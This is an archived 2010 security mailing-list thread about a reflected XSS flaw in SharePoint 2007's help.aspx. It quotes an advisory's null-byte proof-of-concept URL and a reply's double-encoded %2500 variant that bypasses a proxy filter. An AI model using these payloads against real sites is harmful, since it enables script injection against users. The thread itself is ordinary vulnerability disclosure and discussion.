Dailydave mailing list archives

Re: Sharepoint FTW! :>

From: NeZa <neza0x () gmail com>
Date: Fri, 30 Apr 2010 09:57:44 -0500

My proxy filters out Null byte chars, however due to SharePoint decoding
design, that helped to bypass my Proxy by injecting the well known variant
%2500, so below string also works:

http://wss1-ch-bfr/_layouts/help.aspx?cid0=MS.WSS.manifest.xml%2500%3Cscript%3Ealert%28%27VivaMexico!!%27%29%3C/script%3E&tid=X

My 2 pesos!

On Thu, Apr 29, 2010 at 2:48 PM, dave <dave () immunityinc com> wrote:

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Has anyone checked out this Sharepoint 2007 XSS? Does it work? Sharepoint
is one of
the single largest data security risks in most large Enterprises and
everyone pretty
much ignores it, which is always funny. :>


http://www.htbridge.ch/advisory/xss_in_microsoft_sharepoint_server_2007.html

This is the string that's supposed to work. Someone try it and let us all
know! :>


http://host/_layouts/help.aspx?cid0=MS.WSS.manifest.xml%00%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E&tid=X

- -dave
(Note: I'm recovering from an illness - your emails will be answered in the
order
they were received!)
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)
Comment: Using GnuPG with Fedora - http://enigmail.mozdev.org

iEYEARECAAYFAkvZ4psACgkQtehAhL0ghep4lQCcDY4wc2y9Icx/1oyd+oFgNMun
VPwAnAnc4dDlUFXVyS3NtsKHdkyG/Q73
=eAv+
-----END PGP SIGNATURE-----
_______________________________________________
Dailydave mailing list
Dailydave () lists immunitysec com
http://lists.immunitysec.com/mailman/listinfo/dailydave




-- 
Daniel Regalado
NeZa Rifa!!!

_______________________________________________
Dailydave mailing list
Dailydave () lists immunitysec com
http://lists.immunitysec.com/mailman/listinfo/dailydave

Current thread:

Sharepoint FTW! :> dave (Apr 29)
- Re: Sharepoint FTW! :> pUm (Apr 30)
- Re: Sharepoint FTW! :> Steve Shockley (Apr 30)
- Re: Sharepoint FTW! :> NeZa (Apr 30)